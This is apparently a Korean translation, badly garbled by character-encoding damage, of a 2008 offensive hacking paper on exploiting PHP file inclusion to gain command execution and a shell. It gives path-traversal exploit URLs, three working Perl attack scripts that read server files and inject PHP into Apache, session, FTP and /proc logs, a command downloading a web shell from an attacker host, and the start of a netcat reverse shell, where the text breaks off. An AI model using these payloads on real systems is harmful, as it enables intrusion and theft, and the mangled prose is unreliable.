|=--------=[ ½Ã½ºÅÛÀ¸·ÎÀÇ Á¢±ÙÀ» À§ÇÑ À¥Ãë¾àÁ¡ ]=---------=| |=-----------------------------------------------------------------------=| |=----=[ pepelux[at]enye-sec[dot]org - ]=------=| |=-----------------------------------------------------------------------=| |=----=[ spanish translation available in http://www.enye-sec.org ]=-----=| |=-----------------------------------------------------------------------=| |=---------------------------=[ Oct 12th 2008 ]-=------------------------=| Translated by bOBaNa (http://www.wowhacker.com) 2008.10.25 ( ³¯¸² ¹ø¿ª Á˼Û....¤Ð¤Ð) --[ Content 1 - Introduction 2 - Local and Remote File Inclusion (LFI/RFI) 2.1 - Introduction 2.2 - Executing commands remotely 2.2.1 - Injecting PHP code into apache logs 2.2.2 - Injecting PHP code into process table 2.2.3 - Injecting PHP code into an image 2.2.4 - Injecting PHP code into session files 2.2.5 - Injecting PHP code into other files 2.3 - Obtaining a shell 2.4 - Remote File Inclusion 3 - Blind SQL Injection 3.1 - Introduction 3.2 - Loading local files 3.3 - Obtaining data without brute force 3.4 - Executing commands remotely 3.5 - Obtaining a shell 4 - References ---[ 1 - ¼Ò°³ À¥»çÀÌÆ®¸¦ ÀͽºÇ÷ÎÀÕÇÒ ¼ö ÀÖ°Ô ÇØÁÖ´Â ¸¹Àº Ãë¾àÁ¡µéÀÌ ÀÖ°í, ÀÌµé ¸ðµÎ´Â ¿À·¡ µÇ¾ú°Å³ª, ¹®¼­È­µÇ¾î ÀÖ´Ù. LFI, RFI, SQL, XSS, SSI, ICH µîÀÇ °ø°ÝµéÀ» ãÀ» ¼ö ÀÖ´Ù. ÀÌ·¯ÇÑ ÀÌÀ¯·Î ÀÌ ¹®¼­¿¡¼­´Â ½Ã½ºÅÛÀ¸·Î Á¢±ÙÇÏ°í ¿ø°ÝÀ¸·Î ¸í·ÉµéÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Â °ø°ÝµéÀ» ÁßÁ¡ÀûÀ¸·Î ÀÌ ¹®¼­ÀÇ Á߽ɿ¡ µÑ °ÍÀÌ´Ù. ¶Ç ´Ù¸¥ ¹®¼­¿¡ ¸ðµç ÇüÅÂÀÇ Ãë¾àÁ¡(¿©·¯ºÐÀÌ ¾Ë°í ÀÖ´Â °°Àº °ø°Ý)µéÀ» ÀÛ¼ºÇÏ´Â °ÍÀº Áö·çÇϱ⠶§¹®¿¡ ³ª´Â »õ·Î¿î °Íµé·Î ±â°íÇÏ°íÀÚ ÇÒ °ÍÀ̸ç, ±âº»ÀûÀÎ °³³äµé À» ±â¾ïÇÏ°íÀÚ ÇÒ °ÍÀÌ´Ù. ---[ 2 - ·ÎÄà ¹× ¿ø°Ý ÆÄÀÏ »ðÀÔ Ãë¾àÁ¡(Local and Remote File Inclusion (LFI/RFI) ) ----[ 2.1 - ¼Ò°³ ÀÌ·¯ÇÑ ÇüÅÂÀÇ °ø°ÝÀº Àß ¾Ë·ÁÁ® ÀÖ°í, ±âº»ÀûÀ¸·Î require, require_once, include ȤÀº include_once ¸í·É¾îµé¿¡ ÀÇÇØ ´Ù¸¥ ÆÄÀϵéÀ» È£ÃâÇÏ°Ô ÇÒ ¼öÀÖ´Â PHPÆäÀÌÁö°¡ À߸ø ÇÁ·Î±×·¡¹ÖµÇ¾î ÀÖ´Â °ÍÀ» ÀÌ¿ëÇÏ¿© ½Ã½ºÅÛ ÆÄÀÏÀ» ÀÐÀ» ¼ö ÀÖ°Ô²û Á¸ÀçÇÑ´Ù. ÇÊ¿¬ÀûÀ¸·Î, ÀÌ·¯ÇÑ È£ÃâµéÀº ¹Ýµå½Ã ÃʱâÈ­°¡ µÇ¾îÀÖÁö ¾ÊÀº ä »ç¿ëµÇ¾î¾ß ÇÑ´Ù. ¿¹ : require($file); require("includes/".$file); require("languages/".$lang.".php"); require("themes/".$tema."/config.php"); ÀÌ°ÍÀ» °ø°ÝÇϱâ À§ÇÑ ¹æ¹ýµéÀº Àß ¾Ë·ÁÁ® ÀÖÀ¸¸ç, ³ª´Â ÀÌ°ÍÀ» ÀÚ¼¼È÷ ÇÏÁö ¾Ê´Â´Ù. ¿ÀÁ÷ ±×°ÍÀ» ¿­°ÅÇÒ »ÓÀÌ´Ù. ¿¹¸¦ µé¾î: Type of call: require($file); Exploit: http://host/?file=/etc/passwd Type of call: require("includes/".$file); Exploit: http://host/?file=../../../../../etc/passwd Tpye of calls: require("languages/".$lang.".php"); require("themes/".$theme."/config.php"); Exploit: http://host/?file=../../../../../etc/passwd%00 Type of call: require("languages/".$_COOKIE['lang'].".php"); Exploit: javascript:document.cookie = "lan=../../../../../etc/passwd%00"; ÀÌ·¯ÇÑ ÇüÅÂÀÇ Ãë¾àÁ¡(GET ȤÀº POST¿¡ ÀÇÇÑ)µéÀ» ÀͽºÇ÷ÎÀÕÇϱâ À§ÇÑ ½ºÅ©¸³Æ® ´Â : lfi.pl --------------------------------------------- #! /usr/bin/perl # perl script to exploit LFI based in GET and POST requests # Example: http://site.com/index.php?var= # URL: http://site.com/index.php # Variable: var # Method: POST # # by Pepelux (pepelux[at]enye-sec[dot]org) use LWP::UserAgent; $ua = LWP::UserAgent->new; my ($host, $var, $method) = @ARGV ; unless($ARGV[2]) { print "Usage: perl $0 \n"; print "\tex: perl $0 http://site.com/index.php var GET\n"; print "\tex: perl $0 http://site.com/index.php var POST\n\n"; exit 1; } $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1)"); $ua->timeout(10); $host = "http://".$host if ($host !~ /^http:/); while () { print "file to edit: "; chomp($file=); if ($method =~ /GET/) { $url = $host."?".$var."=../../../../..".$file."%00"; $req = HTTP::Request->new(GET => $url); $req->header('Accept' => 'text/html'); } else { $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content($var."=../../../../".$file."%00"); } $res = $ua->request($req); if ($res->is_success) { $result = $res->content; print $result; } else { print "Error\n"; } } --------------------------------------------- ----[ 2.2 - ¿ø°ÝÀ¸·Î ¸í·É¾î¸¦ ½ÇÇàÇϱ⠿츮°¡ º¸¾Ò´ø ÀÌ·¯ÇÑ ÇüÅÂÀÇ Ãë¾àÁ¡Àº À¥ À¯Àú°¡ ÀбⰡ´ÉÇÑ Á¢±ÙÀ» °¡Áö´Â ¾î¶² ½Ã½ºÅÛ ÆÄÀÏÀ» º¼ ¼ö ÀÖ°Ô ÇØÁÖÁö¸¸, ¶ÇÇÑ ½Ã½ºÅÛ ¸í·É¾îµéÀ» ½ÇÇàÇÒ ¼ö ÀÖ°Ôµµ ÇØÁØ´Ù. ÀÌ·¯ÇÑ °ÍÀ» Çϱâ À§ÇØ Æ¯Á¤ ÆÄÀÏ¿¡ ÀÌ·¯ÇÑ php Äڵ带 ÀÛ¼ºÇØÁÖ´Â °ÍÀÌ ÇÊ¿äÇÏ´Ù: cmd´Â GETÀ¸·Î µ¥ÀÌÅ͸¦ ¿ì¸®ÀÇ º¯¼ö¿¡ ³Ö±â À§ÇÑ À̸§ÀÌ´Ù. Áö±Ý, ¿ì¸®´Â µ¥ÀÌÅ͸¦ ¾µ ¼ö Àִ ƯÁ¤ Àå¼Ò¸¦ ã±â¸¸ ÇÏ¸é µÈ´Ù. ¾î¶»°Ô Çϳª? ¿©·¯°¡Áö ¹æ¹ýµéÀ» °¡Áö°í ÀÖ´Ù: -----[ 2.2.1 - ¾ÆÆÄÄ¡ ·Î±×·Î PHP Äڵ带 »ðÀÔÇϱ⠿츮´Â ¾ÆÆÄÄ¡ ¼­¹ö´Â access_log¿Í error_log¿¡ ¸ðµç ¿î¿µ ·Î±×µéÀ» ÀúÀåÇÑ´Ù´Â °ÍÀ» ¾È´Ù. ±â·ÏµÈ µ¥ÀÌÅ͵é°ú ³î ¼ö ÀÖÀ¸¸ç, PHP Äڵ带 »ðÀÔ½ÃÅ°µµ·Ï ÇÒ ¼ö ÀÖ´Ù. ¿¹¸¦µé¾î, error_log ÆÄÀÏ¿¡ »ðÀÔÇϱâ À§ÇÑ °ÍÀº Á¸ÀçÇÏÁö ¾Ê´Â ÆÄÀÏ¿¡ ¾²±âÀ§ÇØ ÇÊ¿äÇÑ Äڵ带 º¸³»´ÂÆäÀÌÁö¸¦ È£ÃâÇÏ´Â °ÍÀ¸·Î ÃæºÐÇÏ´Ù. : http://host/xxxxxxx= ÀÌ°ÍÀº error_log¿¡ ¿ì¸®°¡ ÀÛ¼ºÇß´ø Äڵ带 »ðÀÔÇÏ´Â ¶óÀÎÀ» »ðÀÔÇÒ °ÍÀÌ´Ù. ±×¸®°í Áö±Ý? ¿ì¸®°¡ ÇÒ°ÍÀº ¿ÀÁ÷ ÀÌÀü¿¡ Çß´ø ¹æ¹ý°ú µ¿ÀÏÇÑ ¹æ¹ýÀ¸·Î ÀÌ ÆÄÀÏÀ» ºÒ·¯¿À±â¸¸ ÇϸéµÇ¸ç ¿ì¸®°¡ ½ÇÇà½ÃÅ°±æ ¿øÇÏ´Â ¸í·É¾î¸¦ cmd º¯¼ö¸¦ ÅëÇØ º¸³»¸é µÈ´Ù. http://host/?file=../../../var/apache/error_log&cmd=ls /etc http://host/?file=../../../var/apache/error_log&cmd=uname -a ±×·¯³ª, ¾î¶»°Ô ¾ÆÆÄÄ¡ ·Î±×ÀÇ À§Ä¡¸¦ ¾Ë °ÍÀΰ¡? ±×°Ç ¿î¿µÃ¼Á¦¿Í ½Ã½ºÅÛ°ü¸®ÀÚ¿¡ ÀÇÁ¸ÇÑ´Ù. ÇÑ°¡Áö ¿É¼ÇÀº ·Î±×µéÀÌ ÀúÀåµÇ´Â ÀûÀÎ ´ëÇ¥ÀûÀÎ µð·ºÅ丮¸¦ ã´Â °ÍÀÌ´Ù.: /var/log/apache/ /var/log/httpd/ /usr/local/apache/logs/ ...... °øÀ¯µÈ ¼­¹ö¿¡¼­ ¿ì¸®´Â ´ÙÀ½ »óȲÀ» º¼ ¼ö ÀÖ´Ù: /path/host.com/www /logs /data ÀÌ·¯ÇÑ °æ¿ì¿¡´Â, Á¸ÀçÇÏÁö¾Ê´Â ÆÄÀÏÀ» ½á¾ß¸¸ ÇÏ´Â °æ·Î¸¦ ¾Ë±â À§Çؼ­, ¿¹¸¦µé¾î: http://host/?file=xxxx È­¸é¿¡¼­ ´ÙÀ½°ú °°Àº À¯»çÇÑ °ÍÀ» º¼ °ÍÀÌ´Ù: Warning: require(xxxx) [function.require]: failed to open stream: No such file or directory in /var/www/host.com/www/p.php on line 2 ·Î±× ÆÄÀϵéÀº /var/www/host.com/logs¿¡ ÀÖ´Ù´Â °ÍÀ» À¯ÃßÇÒ ¼ö ÀÖ´Ù. ·Î±× °æ·ÎÀÇ Àå¼Ò¸¦ ¾Ë¾Æ³»±â À§ÇÑ ¶Ç´Ù¸¥ ¹æ¹ýÀº ´ÙÀ½°ú °°ÀÌ À¯»çÇÑ °ÍÀ» º¼ ¼ö ÀÖ´Â httpd.conf ¼³Á¤ÆÄÀÏÀ» º¸´Â °ÍÀÌ´Ù: ErrorLog /var/log/apache/error.log ¾Æ´Ï¸é °øÀ¯µÈ ¼­¹öÀÇ °æ¿ì¿¡´Â: ErrorLog /home/chs/host.com/home/logs/error_log ±×·¸Áö¸¸, ÀÌÀü¿¡ '¿î¿µÃ¼Á¦³ª ¾ÆÆÄÄ¡ ¹öÀü°ú ½Ã½ºÅÛ°ü¸®ÀÚ¿¡ ´Þ·ÁÀÖ´Ù.'¶ó°í ÀÛ¼ºÇÏ¿´´ø°ÍÀº °ÍÀº ÀÌ À§Ä¡¿¡ ÀÖÁö ¾ÊÀ» ¶§ °¡´ÉÇÏ´Ù´Â °ÍÀÌ´Ù. ¶ÇÇÑ, ÇÁ·Î¼¼½º Å×À̺íÀ» °Ë»öÇÔÀ¸·Î½á ¾ÆÆÄÄ¡ ·Î±×ÀÇ °æ·Î¸¦ ãÀ» ¼ö ÀÖ´Ù: /proc/{PID}/fd/{FD_ID} (¹®Á¦´Â ƯÁ¤ ½Ã½ºÅÛ¿¡¼­´Â fdµð·ºÅ丮´Â ¿ÀÁ÷ ±× À¯Àú¿¡ ÀÇÇؼ­¸¸ Á¢±Ù°¡´ÉÇÏ´Ù´Â °ÍÀÌ´Ù.) HTTP ¿äû°ú ´ÙÀ½À» ¸¸µé ¼ö ÀÖ´Â ¾ÆÆÄÄ¡ ¼¼¼ÇÀÇ PID¸¦ ¾Ë¾Æ³»´Â °ÍÀº /proc/self/stat ³»¿ëÀ» Àд °ÍÀÌ´Ù. Self´Â ½Ã½ºÅÛ¿¡¼­ ¸¶Áö¸·À» »ç¿ëµÈ PID¿¡ ´ëÇÑ ¸µÅ©À̱⠶§¹®¿¡, ¿ì¸®´Â /proc/self¸¦ ÁÖ½ÃÇÔÀ¸·Î½á ÆÄÀÏÀ» ÀÐÀ» ¼ö ÀÖ´Ù. /proc/{PID}/fd ¾È¿¡´Â access_log¿Í error_log °æ·Î¸¦ ã´Â ºÐ¼®À» À§ÇÑ ÀûÀº ¸µÅ©µé¸¸ÀÌ Á¸Àç ÇÑ´Ù. ÀÌ ÀÛ¾÷À» ¼öÇàÇϱâÀ§ÇØ /proc/self/fd/ µð·ºÅ丮¾È¿¡¼­ error_log °æ·Î¸¦ ã±âÀ§ÇØ ¸ðµç ¸µÅ©µéÀ» °Ë»öÇÏ´Â perl ½ºÅ©¸³Æ®¸¦ »ç¿ëÇÏ·Á°í ÇÑ´Ù. proc.pl --------------------------------------------- #! /usr/bin/perl # ¾ÆÆÄÄ¡ ·Î±×ÀÇ °æ·Î¸¦ ã±âÀ§ÇÑ ÆÞ ½ºÅ©¸³Æ® # Example: # URL: http://site/index.php # Variable: file # Method: POST # # by Pepelux (pepelux[at]enye-sec[dot]org) use LWP::UserAgent; $ua = LWP::UserAgent->new; my ($host, $var, $method) = @ARGV ; unless($ARGV[2]) { print "Usage: perl $0 \n"; print "\tex: perl $0 http://site.com/index.php file GET\n"; print "\tex: perl $0 http://site.com/index.php file POST\n\n"; exit 1; } $ua->agent(""); $ua->timeout(10); $host = "http://".$host if ($host !~ /^http:/); if ($method =~ /GET/) { $url = $host."?".$var."=../../../../proc/self/stat%00"; $req = HTTP::Request->new(GET => $url); $req->header('Accept' => 'text/html'); } else { $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content($var."=../../../../proc/self/stat%00"); } $res = $ua->request($req); if ($res->is_success) { $result = $res->content; $result =~ s/<[^>]*>//g; $x = index($result, " ", 0); $pid = substr($result, 0, $x); print "Apache PID: ".$pid."\n"; } if ($method =~ /GET/) { $url = $host."?".$var."=../../../../proc/self/status%00"; $req = HTTP::Request->new(GET => $url); $req->header('Accept' => 'text/html'); } else { $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content($var."=../../../../proc/self/status%00"); } $res = $ua->request($req); if ($res->is_success) { $result = $res->content; $result =~ s/<[^>]*>//g; $x = index($result, "FDSize",0)+8; $fdsize = substr($result, $x, 3); print "FD_SIZE: ".$fdsize."\n"; } for ($cont = 0; $cont < $fdsize; $cont++) { $file = "../../../../proc/".$pid."/fd/".$cont; open FILE, $file; while() { if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) { print "FD: ".$cont."\n"; exit; } } } --------------------------------------------- pepelux:~$ perl proc.pl http://host/index.php page GET Apache PID: 4191 FD_SIZE: 64 FD: 2 /proc/{PID}/fd/{fd_ID}´Â À¯Àú¿¡ ÀÇÇØ ÀÐÈú¼ö ÀÖ´Â FD¿¡ ½ºÅ©¸³Æ®°¡ Á¸ÀçÇÑ´Ù¸é, ÀÌ·¯ÇÑ °æ¿ì¿¡´Â ¿ì¸®´Â /proc/4191/fd/2ÀÇ error_log¿¡ ¸µÅ©¸¦ °¡Áú °ÍÀÌ´Ù. È£ÃâÀ» Ãß°¡ÇÏ´Â ½ºÅ©¸³Æ®¸¦ ¼öÁ¤ÇÏ´Â °Í http://host/?file=/proc/4191/fd/2&cmd=uname -a (ù¹ø° ½ºÅ©¸³Æ®¸¦ º¸¶ó). access_log¿¡ ÀúÀåµÉ °ÍÀÎ ¿¡·¯³ª ·Î±×¿î¿µÀÌ µÇµ¹¾Æ°¡Áö ¾Ê´Â URLÀ» ÀÌ¿ëÇØ »ðÀÔÀ» ¸¸µé ¼ö ÀÖ´Ù: (We also can make the injection using an URL that doesn't back an error and log operation will be saved on access_log:) http://host/index.php?x= Àº ¾ÆÆÄÄ¡°¡ Á¤È®È÷ »ðÀÔÀ» ÀúÀåÇÏÁö ¸øÇÏ°Ô Çϰųª ¸¦ ±×¿¡ ÇØ´çÇÏ´Â 16Áø¼ö °ªÀ¸·Î º¯È¯ÇÏ°Ô ÇÏ´Â °Ô °¡´ÉÇÏ´Ù. ÀÌ·¯ÇÑ °æ¿ì¿¡´Â GET°ú POSTÀ¸·Î PHP ¸í·ÉÀ» º¸³»·Á°í ÇÏ´Â ±× ¾î¶² °Íµµ ÇÒ¼ö¾ø´Ù. ´õ ¸¹Àº µ¥ÀÌÅ͵éÀº access_log¿Í ¿ì¸®°¡ »ðÀÔÇÒ ¼ö ÀÖ´Â Àå¼ÒÀÎ referer³ª user- agent¿¡ ÀúÀåµÈ´Ù. ÀÌ ÆÞ ½ºÅ©¸³Æ®¸¦ ÀÌ¿ëÇؼ­ ƯÁ¤ Å×½ºÆ®¸¦ ÇÏ·Á°í ÇÑ´Ù: cmd.pl --------------------------------------------- #! /usr/bin/perl # À¥ LFI Ãë¾àÁ¡¿¡¼­ CMD¸¦ »ðÀÔÇϱâ À§ÇÑ ÆÞ½ºÅ©¸³Æ® # Example: # Host: http://host.com # type: U # # by Pepelux (pepelux[at]enye-sec[dot]org) use LWP::UserAgent; $ua = LWP::UserAgent->new; my ($host, $type) = @ARGV ; $code=""; unless($ARGV[1]) { print "Usage: perl $0 [URI|UAG|REF]\n"; print "\tURI: URI\n"; print "\tUAG: User-Agent\n"; print "\tREF: Referer\n\n"; print "\tex: perl $0 http://host.com URI\n"; exit 1; } $host = "http://".$host if ($host !~ /^http:/); if ($type =~ /UAG/) { $ua->agent($code); } else { $ua->agent("Mozilla/5.0"); } if ($type =~ /URI/) { $$host .= "/" . $code; } $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content("x=x"); if ($type =~ /REF/) { $req->referer($code); } $res = $ua->request($req); --------------------------------------------- Á¸ÀçÇÏÁö¾Ê´Â URI¸¦ º¸³»´Â error_log¿¡ ÀÛ¼ºÇϱâ: pepelux:~$ perl cmd.pl http://host.com/blabla URI error_log¿¡¼­ º¼¼ö ÀÖ´Ù: [Wed Oct 08 12:50:00 2008] [error] [client 11.22.33.44] File does not exist: /home/chs/host.com/home/html/blabla User-Agent·Î ½ÃµµÇϱâ: pepelux:~$ perl cmd.pl http://host.com/blabla UAG error_log¿¡¼­ µ¿ÀÏÇÑ °ÍÀ» º¼ ¼ö ÀÖ´Ù: [Wed Oct 08 12:50:00 2008] [error] [client 11.22.33.44] File does not exist: /home/chs/host.com/home/html/blabla Referer·Î ½ÃµµÇϱâ: pepelux:~$ perl cmd.pl http://host.com/blabla REF ÀÌ·¯ÇÑ °æ¿ì¿¡ ¿ì¸®´Â »ðÀÔÀ» ȹµæÇÑ´Ù: [Wed Oct 08 12:52:54 2008] [error] [client 11.22.33.44] File does not exist: /home/chs/host.com/home/html/blabla, referer: ÀÌÁ¦ ¿ì¸®´Â error_log Á¤º¸¸¦ ÀúÀåÇÏ´Â access_log¿¡ ¾²·Á°í ÇÑ´Ù: pepelux:~$ perl cmd.pl http://host.com/index.php URI À̶§ ¿ì¸®´Â ´ÙÀ½À» ¾ò´Â´Ù: 11.22.33.44 - - [08/Oct/2008:12:57:39 +0200] "POST /index.php/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1" User-Agent·Î ½ÃµµÇϱâ: pepelux:~$ perl cmd.pl http://host.com/index.php UAG ¿ì¸®´Â »ðÀÔ(Injection)À» ¾ò´Â´Ù: 11.22.33.44 - - [08/Oct/2008:13:00:05 +0200] "POST /index.php HTTP/1.1" 301 - "-" "" Referer·Î ½ÃµµÇϱâ: pepelux:~$ perl cmd.pl http://host.com/index.php REF ¿ì¸®´Â »ðÀÔ(Injection)À» ¾ò´Â´Ù: 11.22.33.44 - - [08/Oct/2008:13:00:56 +0200] "POST /index.php HTTP/1.1" 301 - "" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1)Gecko/2008072820 Firefox/3.0.1" -----[ 2.2.2 - ÇÁ·Î¼¼½º Å×ÀÌºí¿¡ PHP Äڵ带 »ðÀÔÇϱ⠳ª´Â ÀÌ¹Ì ¾Ë°íÀÖ´ø °íÁ¤µÈ °æ·ÎÀÎ °æ¿ìÀÇ /proc/self/environÀ¸·ÎÀÇ »ðÀÔÇÏ´Â ¹æ¹ýÀ» ¼³¸íÇÏ´Â ¹®¼­¸¦ ã¾Ò´Ù.(¾Æ·¡ Âü°íÀÚ·á¿¡¼­ º¼ ¼ö ÀÖ´Ù) ¹®Á¦´Â ÀÌ ÆÄÀÏÀº ¿ÀÁ÷ ·çÆ®¿¡ ÀÇÇؼ­¸¸ Á¢±Ù°¡´ÉÇϱ⠶§¹®¿¡ ¿ì¸®°¡ ±× ÆÄÀÏÀ» ÀÐÀ» ¼ö ¾ø´Ù´Â °ÍÀÌ´Ù. ¾Õ¼­ ÀÛ¼ºÇÑ ´ë·Î, /proc/self´Â ¸¶Áö¸· »ç¿ëµÈ PID·ÎÀÇ ¸µÅ©¶ó ÇÏ¿´°í, self ¸µÅ©¸¦ ÅëÇØ Á÷Á¢ÀûÀ¸·Î Á¢±ÙÇÒ ¼ö Àֱ⠶§¹®¿¡ ¿ì¸®´Â ¾ÆÆÄÄ¡ ÇÁ·Î¼¼½º PID¸¦ ãÀ» ÇÊ¿ä°¡ ¾ø´Ù. °ø°ÝÀº ¾Æ·¡ ÆÄÀÏ·ÎÀÇ È£Ãâ ÀÌÈÄ¿¡ º¸³»´Â User-Agent¿¡¼­ÀÇ »ðÀÔÀ» ÇÏ´Â °ÍÀ¸·Î ÀÌ·ç¾îÁø´Ù. this file: http://host/?file=../../../proc/self/environ&cmd=uname -a self link°¡ ¶Ç´Ù¸¥ PIDÇÁ·Î¼¼½º·Î ¹Ù²î±âÀü¿¡ Áï½Ã »ðÀÔÇÏ¿©¾ßÇÏ°í ¸í·É¾î¸¦ Áï½Ã º¸³»¾ß Çϱ⠶§¹®¿¡ ¾à°£ÀÇ ½ºÅ©¸³Æ®·Î ÀÛ¾÷À» ÇÏ¿©¾ß ÇÒ °ÍÀÌ´Ù. -----[ 2.2.3 - ±×¸²À¸·Î PHP Äڵ带 »ðÀÔÇϱ⠱׸²À¸·Î PHP Äڵ带 »ðÀÔÇÏ´Â °ÍÀº ¼­¹ö¿¡ ÀúÀåµÇ´Â ±×¸²µéÀ» ¾÷·ÎµåÇÒ¼ö ÀÖ°Ô ÇØÁÖ´Â (¿¹¸¦ µé¸é, ¾Æ¹ÙŸ) À¥»çÀÌÆ®µéÀ» ¾Ë¾Æ³»´Â °ÍÀº ÀüÇüÀûÀÌ´Ù. ±×·³ À» ³»¿ëÀ¸·Î ÇÏ´Â ÆÄÀÏÀ» À̹ÌÁö È®ÀåÀÚ·ÎÇÏ¿© ¾÷·Îµå ÇÏ¸é ¾î¶² ÀÏÀÌ ÀϾ±î? È®ÀåÀÚ°¡ ¿Ã¹Ù¸£±â ¶§¹®¿¡ ¹®Á¦¾øÀÌ ¾÷·Îµå ÇÒ¼ö ÀÖÀ»°ÍÀÌ°í µ¿ÀÏÇÑ ¹æ¹ýÀ¸·Î LFI °ø°ÝÀ» ÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. : http://host/?file=path/avatar.gif&cmd=uname -a -----[ 2.2.4 - Injecting PHP code into session files ´ÙÀ½ÀÇ Ãë¾àÇÑ Äڵ带 °¡Á¤ÇÏÀÚ: º¸´Â´ë·Î, À§ ÄÚµå´Â ¾î¶² °ËÁõµµ ¾øÀÌ °ªÀÌ GET¿¡ ÀÇÇØ È¹µæµÇ´Â ¼¼¼Ç º¯¼ö¸¦ ¸¸µç´Ù. ´ÙÀ½À» º¸³¾ ¼ö ÀÖ°í: http://host/?user= ±×¸®°í ´ÙÀ½°ú °°ÀÌ ¿ì¸®ÀÇ ³×ºñ°ÔÀÌÅÍÀÇ ÄíÅ°µéÀ» º¸´Â °ÍÀÌ °¡´ÉÇÏ´Ù: PHPSESSID=b25ca6fea480073cf8eb840b203d343e ¿ì¸®ÀÇ ½Ã½ºÅÛÀÇ ¼¼¼Ç Æú´õ¸¦ ºÐ¼®ÇÏ´Â ³»¿ëÀ» º¸±â: pepelux:~$ more /tmp/sess_b25ca6fea480073cf8eb840b203d343e user|s:26:""; º¸´Â´ë·Î, Äڵ带 ÀúÀåµÈ ¼¼¼Ç¿¡ »ðÀÔÇÒ ¼ö ÀÖ°í, ¶ÇÇÑ ´ÙÀ½ ÆÄÀÏÀ» ÅëÇØ ¸í·É¾îµéÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù : http://host/?file=/tmp/sess_b25ca6fea480073cf8eb840b203d343e&cmd=uname -a ÀÌ °æ¿ì¿¡ À§Ä¡ ÆÄÀÏÀÌ ¾Ë·ÁÁö°í ¾Æ¹«¹®Á¦¾øÀÌ ÆÄÀÏÀ» ¼±ÅÃÇÒ ¼ö ÀÖ´Ù. ¸¸¾à, GETÀÌ ÇÊÅ͸µµÈ´Ù¸é POST¸¦ »ç¿ëÇؼ­ º¸³»¸é µÈ´Ù. -----[ 2.2.5 - ´Ù¸¥ ÆÄÀϵ鿡 PHP ÄÚµå »ðÀÔÇϱâ ÀϹÝÀûÀ¸·Î ·çÆ®¸¸ÀÌ ÀÌ ÆÄÀϵéÀ» ÀÐÀ» ¼ö À־ Á¢±ÙÀ» ÇÒ¼ö ¾øÁö¸¸, ´Ù¸¥ ·Î±×µé¿¡ ¿ì¸®ÀÇ Äڵ带 »ðÀÔ½ÃÅ°´Â °ÍÀº °¡´ÉÇÏ´Ù, ¿¹¸¦µé¾î, FTP ·Î±×µé¿¡: pepelux:~$ ftp host.com 220 ProFTPD 1.3.1 Server (Debian) [host.com] Name (pepelux): Password: ¸¸¾à /var/log/proftpd/proftpd.log¸¦ ÁöÄѺ»´Ù¸é, »ðÀÔµÈ Äڵ带 º¼ ¼ö ÀÖ´Ù: Oct 09 21:50:21 host.com proftpd[11190] host.com ([11.22.33.44]): USER : no such user found from [11.22.33.44] to host.com:21 Ãë¾àÇÑ ¼­¹ö°¡ ±¸¹öÀüÀÇ webalizer¸¦ »ç¿ëÇÏ°í, À¥À¸·Î Á¢±Ù°¡´ÉÇÏ´Ù¸é, usage_DATE.html ÆÄÀÏÀº access_log¿Í referer¿¡ HTML Äڵ带 ÀÛ¼ºÇϵµ·Ï Çã¿ëÇÏ´Â webalizerÀÇ ±¸¹öÀü¿¡ ¿µÇâÀ» ¹ÌÄ¡´Â ¹ö±×¸¦ ÀÌ¿ëÇؼ­ visit statistics¿Í ÇÔ²² »ý¼ºµÇ±â ¶§¹®¿¡ ÇØ´ç ÆÄÀÏÀ» ƯÁ¤ Äڵ带 ½ÇÇàÇϵµ·Ï »ç¿ë ÇÒ ¼ö ÀÖ´Ù. ¿¹¸¦µé¾î: Referer: ÀÌ referer·Î ²¿ÀΠȣÃ⸸ Çϸé, usage_DATE.html ÆÄÀÏ¿¡ ³ªÅ¸³­´Ù. (You only have to do a curl of calls with this referer to enter in the most sent and appears in the usage_DATE.html file.) ¾ÆÆÄÄ¡ ¼­¹ö°¡ PUT ¸í·É¾î¸¦ Çã¿ëÇÏ´Â °æ¿ì¿¡´Â ¿ì¸®ÀÇ ÄÚµå¿Í ÇÔ²² ¾÷·Îµå ÇÒ ¼ö ÀÖ´Ù.: pepelux:~$ telnet host.com 80 Trying 11.22.33.44... Connected to host.com. Escape character is '^]'. OPTIONS / HTTP/1.1 HTTP/1.1 200 OK Date: Sat, 11 Oct 2008 15:06:05 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-5 Allow: GET,HEAD,POST,PUT,OPTIONS,TRACE Content-Length: 0 Connection: close Content-Type: httpd/unix-directory Connection closed by foreign host. »ðÀÔÇϱâ À§ÇØ: pepelux:~$ telnet host.com 80 Trying 11.22.33.44... Connected to host.com. Escape character is '^]'. PUT /file.txt HTTP/1.1 Content-Type: text/plain Content-Length:26 ----[ 2.3 - ½© ȹµæÇϱ⠿ø°ÝÀ¸·Î ¸í·É¾îµéÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù¸é ½Ã½ºÅÛÀ¸·ÎÀÇ ´õ¿í ¸¹Àº Á¢±ÙÀ» °®±â À§ÇØ ½©À» ¾÷·ÎµåÇϵµ·Ï ½ÃµµÇÒ ¼ö ÀÖ´Ù.\ ÇÑ°¡Áö ¹æ¹ýÀº PHP ±â¹ÝÀÇ ½©À» ¸¸µå´Â °ÍÀÌ´Ù. wget ¸í·É¾î¸¦ ÀÌ¿ëÇÏ¿© ´Ù¿î·ÎµåÇÒ¼öÀÖ´Ù: http://host/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php HTTP·Î PHPÆÄÀÏÀ» ´Ù¿î·Îµå ÇÒ ¼ö ¾ø´Ù¸é, TXT ÆÄÀÏ·Î ´Ù¿î·Îµå ¹Þ¾Æ¼­ PHPÆÄÀÏ·Î ÀúÀåÇÒ ¼ö ÀÖ´Ù. ¶ÇÇÑ ¸®¹ö½º ÅÚ³ÝÀ» ½ÃµµÇÒ ¼öµµ ÀÖ´Ù: pepelux:~$ nc -vv -l -p 